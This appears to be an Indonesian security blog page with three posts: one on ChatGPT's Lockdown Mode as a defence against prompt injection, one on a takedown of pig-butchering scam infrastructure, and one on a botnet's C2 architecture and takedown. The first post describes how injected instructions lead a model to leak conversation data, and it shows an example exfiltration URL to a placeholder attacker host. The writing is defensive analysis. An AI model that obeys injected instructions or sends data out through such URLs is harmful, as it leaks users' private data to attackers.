Lockdown Mode OpenAI: Arsitektur Mitigasi Prompt Injection di Level Produk - Ethical Hacking Indonesia

Ethical Hacking Indonesia Juni 08, 2026 Comment
ChatGPT - Prompt Injection

Prompt injection sudah lama dikenal sebagai unsolved problem di LLM security, hal ini dimungkinkan karena solusi dari prompt injection pada LLM tidak bisa diselesaikan hanya di level model. Dimana model tidak punya konteks yang cukup untuk secara konsisten membedakan instruksi yang etis dan instruksi yang di eksekusi melalui konten eksternal seperti link pada dokument pdf, hasil deep search pada internet, dan output tools, semuanya masuk kedalam konteks kepercayaan yang sama.

*team Ethical Hacking Indonesia pernah menguji dan mendapati bahwa LLM menganggap ancaman dan yang bukan ancaman sebagai sesuatu yang sulit untuk di bedakan sehingga mempengaruhi hasil atau output model.

Lockdown Mode yang dibuat oleh OpenAI tidak dirancang untuk mencegah prompt injection pada konten yang diproses ChatGPT. Model dari yang dilakukan oleh OpenAI adalah memindahkan jalur komunikasi antara user dan AI agar memiliki jalur komunikasi yang terindikasi exfiltrasi data dari Model. Hal ini dilakukan karena konteks komunikasi yang dibangun penyerang dan mesin bisa sangat kompleks untuk dijadikan sebagai pola sehingga pendekana khusus yang dilakukan yaitu dengan memblokit semua outbound Network request yang bisa digunakan sebagai jalur atau Channel eksfiltrasi.

Attack Surface yang Sebenarnya

Untuk memahami kenapa Lockdown Mode dirnacang seperti yang terjelaskan, perlu untuk memahami peta bagaimana prompt injection yang berujung ke eksfiltrasi data sebenarnya bekerja:

1. Injeksi masuk via konten eksfiltrasi, file yang diupload user berisi instruksi tersembunyi, cached web conten mengandung payload, atau dokumen yang diproses agent punya hidden text.

2. Model mengikuti instruksi injeksi, karena tidak ada mekanisme yang bisa dipahami sebagai instruksi prompt injeksi dan bukan pada level pembeda input.

3. Mode diinstruksikan mengekstrak data sensitif, dari conversation history, memory, file yang sudah diupload, atau context lain yang tersedia.

4. Data dikirim keluar, via URL parameter (images request, fetch ke external endpoint), via write action ke tool eksternal, atau via file yang dihasilkan dan bisa didownload.

step yang susah untuk diblokir yaitu 1 dan 2 jika dilihat dari pemahaman terhadap perbedaan instruksi yang aman dan tidak aman, Lockdown Mode dirancang untuk menghindari step ke-4. KAlau semua outbound Channel dimatikan, live web browsing, images retrieval dari web, file download, agent mode, canvas networking, maka bahka kalau model berhasil dimanipulasi, attacker tidak punya tempat atau jalur untuk menerima data yang diekstrak.

Anatomi Pembatasan dan Alur Pikiran Yang Dibuat Dibalik Lockdown Mode

Jadi semua pembatassan di Lockdown Mode punya flow yang spesifik dan bukan hanya dirancang untuk aman yang dimaksudkan sebagai tindakan pemblokiran.

Live Web Browsing - Cached content, ini bisa memutus jalur yang jelas merupakan URL-based exfiltartion. Kalau url dibuat untuk request ke https://attacker[.]com/collect?data=<extracted_content>, maka live browsing memunginkan tindakan itu bisa dilakukan, cached content tidak membuat outbound request baru ke domain arbitrary.

Image retrieval dari web diblokir, tindkan ini enuup satu vektor yang bisa digunaakn untuk pixel tracking dan URL-encoded exfiltration via images request. Penyerang bisa menginstruksikan model untuk membuka atau memuat gambar dari url yang sebenarnya endpoint dengan data yang diencode di query parameter atau path URL. upload gambar atau images dari user tetap bisa dilakukan ituinbound dan tidak bisadilakukan outbound.

Deep Search dimatikan, deep search secara inheren melibatkan banyak request ke berbagai domain. Setiap request merupakan potensi jalur eksfiltrasi.

Agent mode dimatikan merupakan hal yang paling signifikan dari attack surface reduction. Agent memungkinkan model menjalankan tool chains multiple tool calls dalam satu sesi, bisa menulis filesystem, membuat HTTP request,berinteraksi dengan API eksternal. Prompt injeksi di konteks agent jauh lebih berbahaya karena model punya agency yang lebih besar. Bahkan satu injeksi yang berhasil bisa memicu chain of actions yang panjang sebelum ada manusia yang menyadari.

Canvas networking, canvar-generated code yang mengakses Network merupakan jalur yang bisa membuat user mungkin tidak sadar bahwa kode yang digenerate bisa membuat outbound request saat dieksekusi. Lockdodwn Mode membutuhkan persetujuan yang eksplisit utnuk setiap Network Access dari Canvas, yang ada pada dasarnya menambahkan human-in-the-loop checkpoint.

File downloade diblokir, kalau model menghasilakn file ang berisi extracted data dan file itu bisa didownload, itu juga merupakan jalur eksfiltrasi, meski manual.

Limitasi Arsitektural yang Perlu Dipahami

Lockdown Mode tidak menyelesaikan prompt injection, melainkan menahan atau membatasi radius dari apa yang bisa dilakukan oleh prompt injection pada model LLM.

Beberapa hal yang tidak terpengaruh Lockdown Mode:

Memory tetap aktif kalau model berhasil dimanipulasi untuk menulis sesuatu ke memory, data itu persist. Ini tidak secara langsung mengirim data ke attacker, tapi kalau attacker bisa membuat user mengakses conversation yang memuat trigger untuk memory manipulation, ini bisa menjadi vektor jangka panjang.

File upload tetap bisa dilakukan user artinya injeksi via malicious document masih sangat mungkin dokumen berisi hidden instruction tetap bisa masuk ke context window. Lockdown Mode tidak melindungi dari injeksi itu sendiri, hanya dari apa yang terjadi setelah injeksi berhasil.

Code execution environment memiliki isolation model tersendiri. Lockdown Mode tidak extend ke Codex, yang berarti workflow yang melibatkan Codex punya attack surface berbeda yang perlu dievaluasi secara terpisah.

Conversation sharing tetap bisa dilakukan. Kalau model bisa dimanipulasi untuk mempengaruhi isi conversation yang kemudian dishare, itu bisa menjadi kanal meski manual dan membutuhkan tindakan tertentu dari user.

Perspektif Praktis Untuk pentester yang mengevaluasi deployment ChatGPT:

Lockdown Mode secara signifikan menutup outbound exfiltration path, tapi injeksi tetap bisa terjadi. Fokus evaluasi bergeser ke: seberapa jauh injeksi bisa mempengaruhi behavior model (bukan data exfiltration), apakah ada connector yang masih aktif dengan write action, dan apakah ada side channel via memory atau conversation sharing. Untuk managed workspace, model threat-nya adalah apakah admin telah mengikuti rekomendasi risk matrix untuk setiap connector.

Untuk developer yang menggunakan ChatGPT atau LLM lain:

Pola arsitektural yang sama bisa diadopsi: pisahkan antara mencegah injeksi (sulit, belum solved) dengan membatasi output channel (lebih deterministik). Principle of least privilege untuk tool access berlaku di sini model tidak perlu punya akses ke semua tool setiap saat. Granularitas yang lebih tinggi dalam mengontrol kapan tool bisa diakses, oleh prompt dari sumber mana, mengurangi exposure tanpa menunggu model-level fix yang mungkin tidak akan datang dalam waktu dekat.


https://thehackernews.com/2026/06/new-chatgpt-lockdown-mode-limits-tools.html


https://help.openai.com/en/articles/20001061-lockdown-mode


Disruption Week: Operasi Takedown Infrastruktur Pig Butchering di Asia Tenggara - Ethical Hacking Indonesia

Ethical Hacking Indonesia Juni 04, 2026 Comment

Image by <a href="https://pixabay.com/users/stevepb-282134/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=2301933">Steve Buissinne</a> from <a href="https://pixabay.com//?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=2301933">Pixabay</a>

Disruption Week: Bedah Teknis Operasi Takedown Infrastruktur Pig Butchering di Asia Tenggara

Terdapat scam center di Asia Tenggara dengan infrastruktur yang menyamai industri, dengan jalur-jalur yyang terpisah mulai dari pencucian uang, berlapis, dan tenaga kerja yang diseludupkan secara paksa untuk menjalankan social Engineering dalam scala masif. Ketika DOJ mengumumkan Disruption Week pada akhir Mei 2026.

Attack Surface: Infrastruktur Berlapis yang Selama Ini Sulit Dijangkau

Scam sompound beroperassi dengan separation of concern yang cukup ketat antara tier. Tier-1 Front-facing social Engineering layer, akun media sosial, email, dan platform messaging, yang dimana mnejadi titik kontk pertama ke korban dengan volume yang sangat masif, Dirsuption Week menginterupsi lebih dari 1,4 juta akun di layer ini. Lifecycle akun-akun ini relatif pendek; ketika diblokir, diganti. aksi ini bisa dijalankan selama platform tidak membatasi atau membuat deteksi prilaku pada platform mereka. Tier-2 Fraudulent investment platform UI yang dirancang untuk mensimulasikan return investment. 

Korban deposit, lihat angka naik di dashboard, baru sadar platformnya palsu ketika coba withdraw, hal ini juga ramai pernah terjadi di beberapa platform yang di promosikan influencer yang juga ditahan oleh kepolisian Republik Indonesia. Platform ini di-host di infrastruktur yang terpisah dari akun Tier 1 biasanya colocation environment atau VPS yang berbeda negara. Disruption Week menargetkan decomissioning server dan colocation environment di layer ini.

Tier-3 Money movement layer Cryptocurrency sebagai medium transfer, ini yang paling menarik dari sisi forensik on-chain. DOJ berbagai informasi dengan sektor private, coinbase, TRM Labs yang kemudian membentuk lebih dari $3,8 juta. angka ini relatif kecil terhadap total volume ($5,8 miliaar kerugian terlaporkan di 2024), tapi dari sisi teknis ini merupakan voluntary freeze berbasis intelligence sharing, dan bukan bagian dari court order yang berarti kecepatan eksekusinya jauh lebih tinggi.

Information Sharing sebagai Exploit Primitive

Dari prespektif operasional, yang paling menarik di Disruption Week adalah mekanisme yang diguanakan. FBI, Scret Service dan HSI ecara lagnsung menyerahkan target intelligence yang berupa IP, akun, wallet address, hosting identifler ke tim teknis dari Apple, Google, Meta, Microsoft, Coinbae, TRM Labs, Zenlayer dan SpaceX. Kemudian masing-masing provider melakukan cross-referencing dengan data internal mereka dan mengambil tindakan secara voluntary berdasarkan terms of service violation, ini penting secara teknikal karena beberapa alsan:

1. Attribution gab ditutup dari dua sisi, penegak hukum punya ground truth dari investigasi tapi tidak punya akses ke platform internals.  Provider punya behavioral data dan graph koneksi tapi tidak punya konteks kriminal. Ketika dua dataset ini digabungkan, cluster yang sebelumnya ambigu bisa diidentifikasi dengan confidence tinggi.

2. Action Velocity Berbeda dari Legal Proces Normal takedown via court order bisa memakan waktu berminggu-minggu atau berbulan-bulan. Voluntary action berbasis ToS bisa dieksekusi dalam hitungna jam. Untuk scammer yang operasinya bergantung pada window availability akun, disruption cepat punya impact yang berbeda dibanding yang lambat.

3. Cross-platform correlation bisa dijalankan satu scammer yang beroperasi di Meta, menggunakan layanan Google, dan meng-host platform di Zenlayer bisa diidentifikasi sebagai entitas tunggal ketika semua provider menggunakan identifier yang sama. Sebelumnya ini tidak terjadi karena tidak ada mekanisme berbagi antara provider dalam Event yang terfokus.

Pig Butchering State Mechine yang Sengaja Dirancang Lambat

Setiap fasse ada karena alasan yang disengajakan, phase trust building bisa berlangsung berminggu-minggu hingga berbulan-bulan karena target fraud yang efektif adalah orang yang cukup engaged untuk mentransfer jumlah besar.

Dari sisi detection: behavioral signature akun Tier 1 yang menjalankan pig butchering berbeda dari spam konvensional. Conversation onboarding-nya panjang, konsisten, dan tidak meminta uang di awal. Rate-based detection kurang efektif di sini volume per akun rendah, tapi conversion rate per akun ke financial loss sangat tinggi. Ini yang membuat pendekatan deteksi berbasis volume tidak cukup; perlu layer behavioral analysis yang lebih dalam.

Colocation dan Hosting Infrastructure sebagai Persistent Layer

Server yang menjalankan fake investment platform membutuhkan reliable uptime  korban harus bisa login dan melihat portfolio mereka naik. Ini berarti scammer menggunakan hosting infrastructure yang lebih permanen dibanding akun Tier 1 yang sifatnya sementara. Zenlayer merupakan provider dengan PoP di Asia Pacific yang digunakan untuk deliver konten dengan latensi rendah ke kawasan tersebut. Ketika hosting infrastructure di-decommission, fake investment platform menjadi tidak accessible. Ini mematikan Tier 2 layer sementara Tier 1 sudah diblokir secara bersamaan.

Note:

"decomissioning ini tidak permanen kalau scammer tinggal pindah ke hosting provider lain. IMPACT nyata dari aksi ini adalah disruption temporal dan pengumpulan data TTP mereka untukk melakukan tracking ke depan, terutama pola pemilihan hosting dan rotasi infrastruktur."

On-Chain Forensics: $3,8 Juta dan Sisanya

Angka $3,8 juta yang dibekukan perlu dikontekstualisasikan, IC3 melaporkan $5,8 miliar kerugian di 2024 dari kategori ini, dan angka 2025 sudah naik ke $7,2 miliar. Artinya yang berhasil dibekukan adalah sebagian sangat kecil  mayoritas fund sudah bergerak melalui layering yang cukup dalam sebelum intelligence bisa ddi deteksi. 

TRM Labs merupakan blockchain analytic firm yang spesialisasinya adalah transaction graph analysis melacak alur fund melalui mixing, chain hop, dan Exchange. Coinbase sebagai Exchange punya keamampuan freeze ketika wallet yang diidentifikasi mencoba Chash out. Freeze yang terjadi di Disruption Week kemungkinan besar adalah intercept di titik cash-out atau di exchange layer sebelum fund keluar ke fiat. Ini choke point paling actionable karena scammer pada akhirnya harus konversi ke fiat untuk kebutuhan operasional.

Flow yang paling sulit diikuti secara forensik adalah yang menggunakan chain hop ke privacy coin kemudian kembali ke BTC atau ETH sebelum masuk exchange. Kalau Disruption Week berhasil freeze $3,8 juta. Yang paling permanen dari operasi ini bukan 1,4 juta akun yang diblokir. Yang permanen adalah dua hal: relationship antara provider dan penegak hukum yang sudah terbentuk, dan precedent bahwa voluntary action berbasis intelligence sharing bisa dieksekusi pada skala ini dalam window waktu yang sangat singkat. Keduanya jauh lebih sulit untuk di-counter dibanding takedown infrastruktur yang bisa di-rebuild dalam hitungan beberapa hari.

Baca Juga Tentang: Dampak-Negatif-DataBreach FBI-Warning Trojan-Bank 

Benediktus Sava – Security Researcher

Sumber: Meta Justice-gov


Anatomi Botnet 17 Juta Node: Bagaimana Infrastruktur C2 Bertahan dan Bagaimana Cara Men-takedown- Ethical Hacking Indonesia

Ethical Hacking Indonesia Juni 01, 2026 Comment

Image by <a href="https://pixabay.com/users/thedigitalartist-202249/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=1881694">Pete Linforth</a> from <a href="https://pixabay.com//?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=1881694">Pixabay</a>

Anatomi Botnet 17 Juta Node: Bagaimana Infrastruktur C2 Bertahan dan Bagaimana Cara Men-takedown

17 Juta perangkat telah teinfeksi oleh botnet, jadi bisa di katakan ada sekitar 4-5 orang penduduk terinfeksi 1 botnet di Belanda, Dengan kondisi bahwa server-server tersebut di-host di negara tersebut. Merespon hal ini kepolisian Belanda dengan NCSC (National Cyber Security Center) - Pusat keamanan Siber Nasional Inggris, melakukan kerjasama dan berhasil melakukan takedown terhadap botnet dengan mengidentifikassi dan menindak 200 server C2

Struktur C2 dan Kenapa 200 Server Bisa Mengontrol 17 Juta Node

Rasio 200 server terhadap 17 juta bot, sekitar 1:85.000 dengan arsitektur yang sangat efisien. Ada beberapa kemungkinana yang membuat server C2 ini menjadi sangat powerfull dan tidak menggunakan arsitektur seperti biasa dimana 1 server mengelola 1 botnet, dengan skala infeksi yang terjadi btonet model ini hampir pasti menggunakan tiered architecture: beberapa layer: relay/proxy dibawah, sejumlah kecil master controller di atas.

Tier Bawah (tier-1) biasanya merupakan fast-flux nodes, IP yang berputar cepat, sering kali memanfaatkan mesin atau perangkat yang sudah terinfeksi untuk melakukan infeksi ke perangkat lain yang di targetkan. Tier ini yang langsung terekspose ke traficc botnet, dan yang pertama kali terlihat atau diketahui jika dilakukan monitoring. tier-2 yang memiliki operasi yang lenih stabil, sering pakai domain generation algorithm(DGA) atau bulletproof hosting. Master controller biasnaya disembunyikan di balik lapisan anonymisasi atau bahkan tidak pernah berkomunikasi langsung dengan bot sama sekali hanya push command ke tier-2.

Statistik serangan 200 server yang teridentifikasi berlokasi di Belanda menunjukkan konsentrasi infrastuktur yang tidak biasa. Ini bisa berarti dua hal: operator memilih single jurisdoction karena alasan yang dipertimbangkan yaitu: latensi, biaya, atau relasi dengan hosting provider tertentu), atau justru 200 server ini hanya sebagain dari infrastruktur yang terlihat, tier paling bawah yang mengelolah komunikasi aktif, sementara backend yang lebih dalam mungkin tersebar di juristik lain atau negara lain.

Infection Vector dan State Machine Bot

Dalam tulisan NCSC(.)nl tidak menyebutkan malware spesifik, tapi dari skala dan komposisi perangkat yang terinfeksi (komputer, tablet, smartphone), hal ini menunjukkan bahwa botnet ini tidak disebarkan dari saku vektor saja. 

Initial access paling mungkin datang dari kombinasi exploitation of unpatched vulnerabilities (terutama di edge devices dan router), credential stuffing terhadap perangkat IoT yang masih pakai default password, dan malicious download/phishing untuk endpoint konvensional.

Setelah initial access, bot lifecycle biasanya berjalan: dropper dieksekusi - establish persistence (registry key, systemd service, atau scheduled task) - kontak C2 untuk receive payload utama - masuk ke state idle/polling, dari satet idle ini, bot menunggu instruksi dari command server, yang sering dilakukan yaitu DDoS, spam relay, credential harvesting, atau distribute payload lebih lanjut lagi.

Botnet ini memiliki infrastruktur yang terbilan kuat karena, kalau malware hanya bergantung pada satu metode presistence, satu restart atau antivirus update sudah cukup untuk membersihkan atau terdeteksi oleh sistem monitoring. Botnet yang sebesar ini sangat mungkin menggunakan sistem layered: fallback yang mati, dan kadang kernel-level rootkit untuk menyembunyikan proses dari user-space scanner.

Attack Surface: Kenapa Edge Devices Jadi Target Utama

NCSC menyebut router dan smart devices secara spesifik sebagai vector yang perlu diperhatikan, karena  Edge devices memiliki beberapa karakteristik yang ideal untuk operator botnet:

Pertama, update cycle yang lambat, router consumer-grade sering tidak mendapat firmware update setelah dua tahun pertama, dan bahkan kalau ada, pengguna jarang menginstalnya. Ini berarti vulnerabilities lama tetap exploitable dalam jangka waktu panjang. 

Kedua, akses langsung ke network traffic, bot yang berjalan di router bisa melakukan traffic inspection, DNS hijacking, atau menjadi pivot point ke perangkat internal di belakangnya jauh lebih powerful dari bot yang berjalan di smartphone. Ketiga, visibility yang rendah. Mayoritas pengguna tidak pernah melihat apa yang berjalan di router mereka, tidak ada antivirus, tidak ada EDR, tidak ada user yang akan notice proses aneh di process list.

Default credential yang masih banyak dipakai. Credential stuffing dengan daftar default password masih efektif sampai sekarang karena adoption dari praktik password hygiene yang baik di perangkat IoT masih rendah.

Bagaimana Takedown Ini Bekerja Secara Operasional

Alur takedownnya menarik untuk dianalisis: researcher melaporkan ke NCSC - NCSC koordinasi dengan kepolisian - investigasi - seizure server + hosting provider cut off akses. 

Ada dua mekanisme berbeda yang terjadi di sini. Penanguhan server oleh kepolisian untuk keperluan forensik itu standar ini untuk preserve evidence dan analisis lebih lanjut (siapa operatornya, command history, daftar bot yang terinfeksi). Tapi hosting provider yang mengambil keputusan sendiri untuk cut off seluruh infrastruktur karena alasan criminal activity  itu yang membuat operasi ini berjalan lebih cepat. 

Ini model yang semakin umum dipakai: law enforcement tidak harus menunggu proses hukum yang panjang untuk menangguh semua aset. Cukup koordinasi dengan hosting provider, tunjukkan bukti aktivitas kriminal, dan provider punya authority untuk terminate service berdasarkan ToS mereka sendiri. Dari sudut pandang bot, hasilnya identik: C2 unreachable, bot masuk ke fallback state atau tidak melakukan aktivitas mencurigakan monitoring.

Yang tidak selesai dari operasi ini: 17 juta perangkat yang masih terinfeksi. Takedown C2 membuat bot "headless" tidak bisa menerima command baru tapi malware di perangkat end-user masih ada. Tanpa C2, bot ini relatif inert, tapi tetap bisa diaktifkan kembali kalau operator membangun infrastruktur baru atau kalau ada attacker lain yang berhasil me-register domain DGA yang sama.

Operasi ini tutup dengan hasil yang baik dari perspektif law enforcement, tapi dari sisi security posture, 17 juta perangkat yang masih terinfeksi itu hal yang harus di perhatikan oleh pihak yang berwenang. Infrastrukturnya mati, tapi attack surface yang membuat perangkat-perangkat itu rentan sejak awal firmware usang, default credential, visibility yang buruk semuanya masih ada.

Baca Juga Tentang: Studi-Kasus: UAC-0057 OYSTER Botnet: ADB-Android Polisi-Indonesia: Law Enforcement PowMix: Botnet

Benediktus Sava – Security Researcher

Sumber: NCSC-NL